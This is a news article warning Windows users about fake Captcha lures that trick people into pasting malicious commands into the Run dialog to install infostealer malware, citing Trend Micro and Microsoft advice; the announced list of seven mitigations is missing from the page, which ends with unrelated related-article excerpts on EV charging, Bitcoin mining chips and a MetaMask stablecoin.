Windows Passwords Are Under Attack — Do These 7 Things Now
SOPA Images/LightRocket via Getty Images
Microsoft Windows is always a premier target for cybercriminal actors, and more often than not, passwords are front and center of their campaign payloads. Be it the pray and spray hackers employing automatic password hacking machines, state-sponsored advanced persistent threat groups targeting the enterprise, or even warnings from security researchers about the threat presented by Copilot AI for SharePoint, Windows passwords are the most valuable of low-hanging fruits. Now Trend Micro has confirmed how one particular password threat is making a determined effort to get hold of yours. Here are seven things you need to do to stop your organization being the next victim of the Captcha hackers.
The Completely Automated Public Turing test to tell Computers and Humans Apart, thankfully shortened to Captcha, is something that we have all encountered and all have much the same hatred for. Being asked to select squares containing images of bicycles or ticking a checkbox to prove we are not a robot (wouldn't a robot be able to do that?) are largely pointless at the best of times, and downright dangerous at the worst. If AI cannot solve a Captcha more often than not, then, frankly, we have nothing to fear from our robot overlords. What we do have to fear, however, are hackers using Captcha methods to initiate an infostealer malware infection chain that ultimately leads to password compromise.
he latest Trend Micro research takes a deep dive into the technical details behind what it refers to as 'a notable surge in fake Captcha cases.' As always, I recommend you go and read that report in full if it is the technical teardown that you are after. The TL;DR, however, is that this wave of fake Captcha attacks is tricking users into pasting malicious commands into the Windows Run dialog, with payloads executed in memory and often employing PowerShell. 'These attacks enable data exfiltration, credential theft, remote access, and loader deployment,' the Trend Micro researchers warned, 'via malware such as Lumma Stealer, Rhadamanthys, AsyncRAT, Emmental, and XWorm.'
Yes, Microsoft has just led a global operation to dismantle much of the Lumma Stealer network infrastructure. No, that doesn't mean you are now safe. As one player is disrupted, so others rise to fill the void. 'These campaigns abuse multiple legitimate platforms, including file-sharing services, content and search platforms, music repositories, URL redirectors and document hosts,' Trend Micro said, and those using Windows operating systems where minimal script execution restrictions are employed are most at risk.
Microsoft has recommended that 'customers always practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers,' as well as 'switching to Passkeys wherever possible and using authentication apps such as Microsoft Authenticator, which warn users about potential phishing attempts.'
The Trend Micro report, however, concludes that organizations should apply the following seven mitigations:
Of course, if you really care about your Windows passwords, I would also add that opening the Windows Run window by pressing Windows+R, pasting the clipboard's content in the run window using CTRL+V, and then pressing Enter to execute it, isn't the best response to a supposed Captcha text. Think smart and don't do that, OK?
Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles
Yahoo
22 minutes ago
- Yahoo
Greenlane expands EV charging corridor to Phoenix
Greenlane announced it is establishing a second commercial electric vehicle (EV) charging corridor, this one connecting Southern California to Phoenix via Interstate 10. This comes as the company recently launched its flagship charging center in Colton, Calif., situated next to San Bernardino, in the heart of California's Inland Empire. The Colton location will serve as the anchor for this new corridor and is centrally located to support its first EV corridor, connecting Southern California to Las Vegas via the I-15 corridor. 'As the 15 goes up to Vegas and the 10 goes over to Phoenix, it's centrally located to support and service both corridors. Eventually, we're going to open up in Blythe and in Phoenix, and that will allow us to have key positions on the corridor. This enables trucks to go from location to location, ensuring they get a full charge without range anxiety,' said Patrick Macdonald-King, CEO of Greenlane, in an interview with FreightWaves. In addition to the corridor expansion, Greenlane also announced a new strategic partnership with EV truck maker and OEM Windrose Technology. Windrose recently validated the viability of long-haul electric trucking when it successfully completed single-charge journeys from Colton to Phoenix. On how the Windrose trucks are able to make the single-charge trip, one factor is in their charging setup. 'They can take an intake of about 800 kilowatt-hours per hour at our sites by putting two CCS chargers on either side of the truck. With their range, they've been able to do a single charge and go from Colton all the way to Phoenix, which has been very impressive. … They've been running the tests with fully loaded cargo. I believe it was about 75,000 pounds of what they were hauling across the corridor … real-world examples of technology and innovation at work,' added Macdonald-King. 'Achieving nearly 300 miles with a GCWR of 74,420 pounds on a single charge with 12% battery left proves that electric long-haul trucking isn't just theory—it's proven real-world performance,' added Wen Han, founder and CEO of Windrose Technology, in the press release. To handle the growth and expansion, the company is implementing forward-thinking infrastructure that can be upgraded to accommodate megawatt charging as the technology becomes available. At its Colton facility, Greenlane deployed 'Trenwa' tunneling throughout the site, allowing for cable upgrades without trenching. This will become important later as more companies switch from CCS to megawatt charging stations. That transition to full megawatt charging will not happen overnight, but it helps to be prepared. 'It depends on how much future planning you're doing on each site,' Macdonald-King said. 'A lot of the sites we're moving forward on into 2026-2027, we're going straight to megawatt charging because the trucks are coming out the following year.' The new corridor will also support Nevoya, an electric trucking company that plans to operate battery-electric trucks along both the I-10 and I-15 corridors. Greenlane anticipates opening the first location on this corridor by 2026, with two locations expected to be operational by the end of that year. 'Overall, we're excited about it. We're working with partners like Navistar and others, and they're very interested in the corridor. We've had a number of customers give us commitments to that corridor, which is why we've been focused on it. We're planning on getting that going, opening the first location probably in 2026, and hopefully two locations by the end of the year to service it,' Macdonald-King said. Greenlane is a joint venture between Daimler Truck, NextEra Energy and BlackRock. The post Greenlane expands EV charging corridor to Phoenix appeared first on FreightWaves. Error in retrieving data Sign in to access your portfolio Error in retrieving data Error in retrieving data Error in retrieving data Error in retrieving data
Yahoo
22 minutes ago
- Yahoo
Jack Dorsey declares victory over China in Bitcoin mining chip race
Jack Dorsey declares victory over China in Bitcoin mining chip race originally appeared on TheStreet. Twitter co-founder and Block, Inc. (NYSE: XYZ) boss Jack Dorsey thinks his team has outdone China in Bitcoin mining chips. Bitcoin mining is the process of using high-end computers to solve cryptographic functions, validate BTC transactions, and add blocks to the network in return for BTC rewards. Dorsey's fintech venture Block has increasingly adopted Bitcoin over the years, and its unit Proto is dedicated to Bitcoin mining. Proto, aiming to decentralize the supply of Bitcoin mining hardware and the distribution of hash rate, is expected to launch a suite of mining chips on Aug. 14. An X user wondered if Dorsey's Proto has "out engineered" China on Bitcoin mining chips, as it would turn the industry upside down. Dorsey simply responded, "we have." On Aug. 13, Block made another major announcement that it will privately raise $1.5 billion for general corporate purposes. How does Trump's China tariff policy affect Bitcoin mining? While the U.S. is the leading Bitcoin mining country in terms of hash rate, it is China that takes the lead in manufacturing mining rig equipment. The world's three largest manufacturers of Bitcoin mining machines, namely Bitmain, Canaan, and MicroBT — all of Chinese origin — build over 90% of global mining rigs. Bitcoin miners, including those based in the U.S., are highly dependent on the mining hardware supply from China. But President Donald Trump's aggressive tariff policy targeted toward China has the U.S. mining industry concerned about its prospects. This is where domestic players like Block come like Block, which recently joined the S&P 500 list, can manufacture Bitcoin mining rigs in the U.S. Co-founder and chairman Dorsey even said during the Q1 2025 earnings call, 'We're building in the United States.' Block's efforts notwithstanding, it will take a few years for the complete onshoring of the Bitcoin mining manufacturing. U.S. manufacturers of mining rigs face the dual challenge of exceeding or at least meeting China's product quality and undercutting its manufacturing costs. The onshoring process could also potentially come to a pause if the U.S. and China reach a long-term consensus on the tariff policy which doesn't put a heavy tax burden on imports of Chinese mining chips. Jack Dorsey declares victory over China in Bitcoin mining chip race first appeared on TheStreet on Aug 13, 2025 This story was originally reported by TheStreet on Aug 13, 2025, where it first appeared. Error in retrieving data Sign in to access your portfolio Error in retrieving data Error in retrieving data Error in retrieving data Error in retrieving data
Yahoo
22 minutes ago
- Yahoo
MetaMask Is Set to Unveil Plans for New Stablecoin: Source
A MetaMask stablecoin could debut as early as Thursday, a source knowledgeable of the initiative confirmed to Decrypt. The Ethereum wallet provider, which will team up with payment services provider Stripe, will introduce the mmUSD stablecoin as the main trading pair for its various services, according to an Aave governance proposal that appeared last week but was subsequently deleted. DLNews first reported on the deleted proposal. Stablecoin platform M^0 is reportedly supporting the effort. MetaMask's mmUSD comes as interest in stablecoins soars, the result of a more favorable U.S. regulatory environment, the tokens' growing acknowledgement by traditional finance firms and the dramatically successful public offering by stablecoin issuer Circle, which rose nearly 675% in its first two weeks of trading. (Circle has lost a good portion of those gains but is still nearly 400% above its IPO price.) Last month, Congress passed the GENIUS Act, which provides regulatory guidance for the tokens that are generally pegged to the value of the U.S. dollar. Multiple companies in recent months have announced stablecoin projects or said that they were exploring them, including banking giants JP Morgan Chase and Bank of America, and brokerage Robinhood. The stablecoin market currently holds a $280 billion market cap, although U.K. bank Standard Chartered has predicted that total could reach $750 billion by the end of 2026. Ethereum software developer Consensys, which counts MetaMask among its projects, told Decrypt in an email that "it had no comment at this time" on the potential stablecoin, including the timing of an announcement. Decrypt also reached out to Stripe, individuals linked to MetaMask and Aave, and to M^0. (Disclosure: Consensys is one of 22 investors in an editorially independent Decrypt.) Last year, payments giant Stripe acquired stablecoin platform Bridge for a reported $1.1 billion. Bridge's software platform allows businesses to accept stablecoins as payments, and has said that it one day hopes to rival global payments networks such as Swift, Mastercard, and Visa. "Stripe is going to build the world's best stablecoin infrastructure, and, to that end, we are delighted to welcome [Bridge] to Stripe," Stripe CEO Patrick Collison said at the time of the acquisition. JP Morgan Dives Deeper into Stablecoins Despite Jamie Dimon Doubts A recent collaboration between MetaMask and Aave will permit wallet users to generate yield from Aave decentralized liquidity protocols via the MetaMask mobile app. Users will be able to access USDC, USDT and DAI yields, Aave said in a blog post. "The integration makes DeFi earnings simpler and more accessible to everyday users," the post said, adding that "his represents MetaMask Earn's first step into DeFi lending, expanding beyond existing staking options." MetaMask has 100 million users, according to its website. Aave totals over $55 billion in net deposits. On Myriad, a prediction market developed by Decrypt's parent company Dastan, 52% of respondents believe that the Ethereum stablecoin market cap will exceed $145 billion in August. Additional reporting by Stacy Jones.
